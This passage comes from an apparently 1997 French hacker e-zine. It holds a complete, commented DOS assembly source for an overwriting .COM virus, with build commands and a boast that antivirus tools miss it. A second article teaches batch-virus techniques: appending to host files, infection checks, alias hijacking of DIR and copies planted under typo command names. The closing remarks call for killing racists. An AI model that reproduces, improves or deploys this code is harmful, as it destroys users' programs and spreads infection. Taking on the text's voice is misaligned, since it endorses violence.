CDRWIN.EXE) ----------------------- ESI+00 : 00 00 00 00 7E 88 3E 1C ESI+08 : FC 10 7D 38 82 98 43 24 ESI+10 : F8 21 FA 70 86 A9 C4 6C ESI+18 : 04 31 87 48 7A B9 B9 54 ESI+20 : F0 43 F4 E1 8E CB CA FD ESI+28 : 0C 53 89 D9 72 DB B7 C5 ESI+30 : 08 62 0E 91 76 EA 30 8D ESI+38 : F4 72 73 A9 8A FA 4D B5 ET vala.. comment ca s'est compliqu‚????? ******************************************************************************* ^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^ Virus exemple Nø1 UnK MnemoniK ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Voila , j'ai essayer de d‚tailler ici un virus trŠs simple et en meme temp trŠs petit , l'astuce de cette petite taille est que le virus se propage en ‚crasant directement sur le fichier , ne tenant pas compte du programme infect‚ , ici , quand on lancera le fichier , il retournera directement sous le prompt , bref on s'apercevra assez vite de l'infection , voir que l'on r‚installera completement les progs infect‚s , ce virus est d‚ja a moiti‚ comdamn‚ , il serait toujours amusant de le lacher sous c:\dos qu'on voie la tˆte du technicien informatique ( que perso je n'arrive jamais a pifer , genre le type : euuuh , ce r‚seau est optimis‚ (:ouarf le vocabulaire) pour Ou-indoze95 , nos plateformes sont … la pointe de la technologie , hum hum et ne touchez pas a ce clavier ; ou bien le type qui arrive quand tu veux t'amuser sur une b‚canne de d‚monstration ou ya un pseudo internet qui en fait n'est qu'une page html sur le disque ventant les m‚rites de la compagnie aprŠs ce bref interlude , voici les explications ************************************************************************** cette partie n'est que du blabla pour que turbo assembleur ne viennent pas raler avec ses gros sabots Ä code segment assume cs:code,ds:code,es:code,ss:code org 100h main proc near Ä La routine start a pour but de mettre en 9Eh le nom du premier fichier'*.com'se trouvant dans ce repertoire grace a la subfonction 4Eh de l'int‚ruption 21h (celle du dos ) , le fichier n'infectera pas les fichiers cach‚s ni ceux en lecture seule , pour cela , il faut placer dans CX un code binaire 00000011B ou 2h Ä START: MOV AL,0 MOV AH,4Eh MOV DX,OFFSET COMFILE INT 21H JMP INFECTE ; saut sur le proc‚ssus d'infection Ä les routines close puis plus ont la fonction de fermer (3Eh) le fichier ouvert et de rechercher le prochain fichier com sur le repertoire actuel (4Fh) , 4Fh n'a besoin d'aucune pr‚paration car elles sont fix‚e avec 4Eh Ä CLOSE: MOV AH,3EH INT 21H PLUS: MOV AH,4FH INT 21H OR AL,AL JNZ BYE Ä ici le proc‚ssus d'infection ‚tant trŠs primaire , il se d‚compose comme ‚tant l'anti-r‚infecteur et infecteur , je m'explique , il ne faut pas que le virus s'‚crase tout le temp sur le meme fichier car l'infection serait impossible puis si le test parait n‚gatif il infecte le fichier Ä INFECTE: MOV AX,3D02H MOV DX,OFFSET 9EH INT 21H MOV BX,AX Ä /³\ vous avez ici l'ouverture du fichier , a partir ce moment les actions d'‚criture lecture sont possible sur le fichier , comme dans le basic ce fichier est affect‚ un num‚ro plac‚ en AX mais ca ne suffit pas car pour les prochaines int‚ruptions , le num‚ro du fichier doit se trouver en BX Ä MOV AH,3FH MOV CX,2 MOV DX,OFFSET MTEST INT 21H CMP WORD PTR MTEST,00B0H Ä routine de test d'infection comme comparaison , nous allons lire les 2 premiers octets (3Fh) et puis les comparer avec ceux du virus (ici B000h (ne pas oublier d'inverser les octets)) , pour ma part j'y ai mis une valeur fictive que j'ai remplac‚ une fois compil‚ , et j'ai ensuite recompiler avec B000h , a noter que MTEST contient les deux premiers octets du fichier Oui mais si un fichier a d‚ja 00B0H comme premiers octets? Les chances restantes sont de 1/65535 , c'est a dire que l'on ne s'en inquiete pas , si le test parait positif , il vas a close Ä JZ CLOSE MOV AX,4200H MOV CX,00 MOV DX,00 INT 21H Ä repositionnement du pointeur au d‚but du fichier ( 42H ) Ä MOV AH,40H MOV CX,84 ; taille du prog MOV DX,OFFSET START INT 21H Ä ici ‚criture de tous les octets depui start sur le fichier Ä BYE: RET Ä informations utiles au programme Ä COMFILE: DB 'coui*.com',0 MTEST: DW ? main endp code ends end main **************************************************************************** j'‚spŠre que vous aurez compris les m‚canismes de ce virus trŠs petit a cause de sa simplicit‚ , pour le compiler faites tasm mj13.asm puis tlink mj13.obj , amusez vous a refaire ou am‚liorez ce virus Je garanti qu'a la sortie de cet article de MJ13 , ce virus n'est pas reconnu par les anti-virus NB : la version MJ13 n'infecte que les coui*.com tandis que la 0B infecte tous les fichiers com Prochain ‚pisode : ca se transforme en infecteur COM *** Envoyez vos questions ou mes bugs a Zorohack@hotmail.com Sp‚cial thanks a chico , si vous avez rien a faire allez voir les articles de phalcon/skism et d'autres sur jesaisquellepage (:Alta vista ca existe non? By -Û UnKM Û- Thanks to Samson ^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^ ****************************************************************************** ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍ VIRUS BATCHS - Un peu d'originalit‚ cot‚ virus ÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * DISCLAMER: Vous Štes seul responsable de l'utilisation de ce * * * * document, et son auteur n'est en aucun cas responsable d'une * * * * mauvaise utilisation par autrui.L'ecriture de ce texte n'est * * * * pas ill‚gale en France mais la cr‚ation de virus du type * * * * decrit l'est. Les virus (‚ventuellement) fournis avec ce * * * * logiciel ne sont l… qu'… but de d‚monstration, et ne doivent * * * * pas ˆtre utilis‚s. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WARNING: N‚cessite une BONNE connaissance du batch et du DOS. NOTE: Mon but n'est pas vraiment de decrire comment cr‚er un virus batch fonctionnel (pour ‡a lisez les fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT) mais plut“t de vous donner des conseils g‚n‚raux et d'expliquer certains passages ardus de cette programmation. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 1/ iNTRODUCTION º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ C'est vrai ‡a, il existe des milliers de virus EXE et COM, mais des virus batchs (BAT) il en existe une vingtaine au grand maximum. Pourquoi? Ils sont certes lents, pas TSR, gros, et il existe peu de fichiers BAT sur un mˆme ordinateur. Cependant presque aucun anti-virus ne peut d‚tecter les virus batchs, ce qui supprime d'un coup tout besoin de moteur de cryptage et de routines d'anti-debugger. De plus avec un bon niveau et de l'exp‚rience (beaucoup) ont peu faire des choses grandioses: … votre avis un virus batch peut-il: 1) Etre r‚sident? 2) Infecter des fichiers EXE et/ou COM? 3) Profiter des fautes de frappe pour s'activer? 4) Se dissimuler d'Edit et de DIR? 5) D‚tecter 4DOS et r‚agir en l'exploitant? 6) Etre un infecteur rapide? La r‚ponse est OUI pour toutes ces questions, et j'affirme que seul un utilisateur avanc‚ peut les detecter si SmartDrv (ou autre) est en m‚moire. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 2/ TECHNIQUES GENERALES º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ En ce qui concerne leur programmation proprement dite il faut avant toute chose pour discerner le virus du code il faut rajouter une chaine de caractŠres identique … toutes les lignes du virus pour le diff‚rencier du programme infect‚. Exemple: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ @Echo off %Virus% ³ <- D‚but du virus ³ ... %Virus% ³ ³ 'instructions du virus' %Virus% ³ ³ goto EndVirus ³ <- ici la chaine est Virus ³ ³ ³ :EndVirus ³ <- Fin du virus ³ @Echo off ³ <- D‚but du programme ³ cls ³ ³ echo Programme infect‚ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Pour extraire le virus seulement dans un fichier il suffira de taper ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ TYPE %0.BAT | Find "Virus" >NewVir.bat ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ %0.BAT repr‚sente le nom du fichier qui vient d'etre lanc‚, sous 4DOS %0.BAT peut ˆtre une erreur et %0 le bon il faut donc d‚terminer lequel employer: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ SET Good=%0 ³ ³ If exist %0.BAT Set Good=%0.BAT ³ ³ If exist %0 Set Good=%0 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ et ensuite seulement: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ TYPE %Good% | Find "Virus" >NewVir.bat ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Pour infecter un fichier il ne vous restera qu'… taper: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Ren file.bat file.old ³ Le virus sera plac‚ AVANT le ³ Copy Newvir.bat + file.old file.bat ³ programme. ³ Del file.old ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Ou encore en employant une structure l‚gŠrement diff‚rente, vous pouvez rendre le code plus court et plus rapide. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Type Newvir.bat|find "Virus">>file.bat ³ Le virus sera plac‚ APRES le ³ ³ Programme ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Cependant il vous faudra d'abord d‚tecter si le fichier que vous visez est d‚j… infect‚ ou non. Pour cel… vous devez g‚n‚rer un code du type suivant qui cr‚era un fichier $VIRUS.BAT ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ echo :virus >$Virus.BAT ³ ³ echo find "Virus" %%1 >>$Virus.bat ³<- Recherche chaine de caractŠres ³ echo If errorlevel 1 goto Y >>$Virus.Bat ³<- Si trouv‚ alors aller en Y ³ echo goto end >>$Virus.bat ³<- Sinon quitter ³ echo :Y >>$Virus.bat ³ ³ echo Set ok=%%1 >>$Virus.bat ³<- Variable OK=Nom_du_fichier.bat ³ echo :End >>$Virus.bat ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Et ensuite appeler le fichier ainsi cr‚‚ de la maniŠre suivante. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ For %%a in (*.bat) do call $Virus %%a ³<- Boucle pour d‚tecter fichier ³ If (%ok%)==() goto Virusend ³<- Pas de fichier, quitter ³ ... 'code d'infection' ... ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ C'est tout pour les techniques g‚n‚rales, … vous de broder autour et de recoller les morceaux de code dans le bon ordre :). ÉÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 3/ ROUTINES º ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ Passons maintenant … des routines plus complexes: Un virus batch peut ˆtre r‚sident, mais pas de la maniŠre ou on l'entend habituellement. En utilisant DOSKEY (command.com) ou ALIAS (4dos.com) vous pouvez r‚affecter des commandes comme DIR par exemple. En supposant qu'un appel … DIR lance votre virus imaginez les d‚gats. Avec l'alias de 4DOS c'est totalement transparent, la command ALIAS DIR=`c:\virus.bat^*DIR` vous d‚charge de l'‚mulation du DIR par votre virus. Mais du coup un problŠme se pose: comment d‚tecter 4DOS? simple il suffit de rajouter un code du style ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ @Echo Off ³ ³ If (%@eval[1+1])==(2) goto 4DOSFound ³ ³ ... ³ ³ 'instructions virus pour command.com' ³ ³ ... ³ ³ Goto EndVirus ³ ³ :4DOSFound ³ ³ ... ³ ³ 'instructions virus pour 4DOS.COM' ³ ³ ... ³ ³ :EndVirus ³ ³ 'debut de programme infect‚' ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Simple, non? Une proc‚dure tr‚s simple permet d'activer votre virus batch lors des fautes de frappe. En effet sous DOS on remarque un certain nombre de fautes classiques telles que DIOR DUR DOR pour DIR, DEM pour DEL, EDIOT pour Edit, etc... Pour cel… il suffit d'extraire le code du virus et de le copier sous ces diff‚rents noms dans un r‚pertoire du PATH (c:\dos par exemple), donnant: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ SET Virus=%0 ³ ³ If exist %0.BAT Set Virus=%0.BAT ³ ³ If exist %0 Set Virus=%0 ³ ³ For %%a in (dior xcopu dem) do TYPE %Virus%|Find "Virus" >c:\dos\%%a.* ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ (… vous d'alonger la liste) Pour infecter les fichiers EXE et COM votre virus doit ˆtre compagnon, c-a-d ayant le mˆme nom que le fichier infect‚. Je vous conseille de lire la FAQ normalement dans ce E-Zine sur le moteur [C-WORM Engine v2.0]. Pour des d‚tails sur l'infection rapide, les modules r‚sidents et Stealth, consultez les FAQs sur les moteurs [ViRAL-BATCH Engine v2.0] et [V-WORM Engine v2.0à]. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 4/ ANTIVIRUS º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Il n'existe en r‚alit‚ qu'un seul anti-virus batch performant, il les detecte de maniŠre heuristique et scanning, il dispose aussi d'un module r‚sidant pour tenter de stopper des monstres du style 'BE-Happy!' ou 'm0o0m' c'est BATCH ANTI-VIRUS v4.33 dont je suis l'auteur. L'interface est assez rudimentaire mais efficace. Certains antivirus commerciaux style TBAV (je crois) d‚tectent quelques vieux virus mais rien de bien efficace. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 5/ REFERENCES º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Voici la courte liste des textes dit de r‚f‚rence en matiŠre de virus batchs: C-WORM TXT - Documentation sur le moteur compagnon C-WoRM v2.00 V-WORM TXT - Documentation sur le moteur V-WoRM v2.00 àlpha (inachev‚) VIRAL TXT - Documentation sur le moteur ViRAL-BATCH v2.00 BAT_MUF TXT - BATCH Microsoft Undocumented "Features" BFVWG TXT - FAQ sur les virus batchs (anciens) ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º 6/ CONSPiRACY oF DaRKNESS [CoD] º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Si vous ne respectez pas l'un des termes suivants alors n'utilisez pas ce document et allez bruler en Enfer. 1/ L'utilisation/cr‚ation des virus pour la destruction d'une machine appartenant … une tiers personne est condamn‚e par [CoD] et par tous les cr‚ateurs responsables. 2/ Il est interdit de modifier ce document, en cas de doute envoyez une copie du document au groupe en indiquant “u vous l'avez trouv‚. 3/ FUCK RACISM & KILL RACISTS, il existe des id‚aux pour lesquels il faut encore ˆtre prˆt … tuer/mourir (si Gros Blond gagnait les ‚lections pr‚sidentielles par exemple). ÄÄ ÄÄ Voil… je crois que c'est tout pour cette fois. Je sais que ce texte peut ne pas sembler tr‚s clair de prime abord, mais il contient un compl‚ment indispensable aux trois fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT. ÄÄ ÄÄ DaRK BiRD / CoD Ecrit pour le groupe MJ13 ****************************************************************************** Et voila... qui cloture l'issue #2.0 on va essayer d'etre plus speed pour la 3. Pour contacter un menbre: alli427@hotmail.com le courrier le concernant lui sera retransmis. et n'oublions pas, nous recherchons des sites de fascisme & pedodophile. ALLIGATOR427 / MJ13 03/1997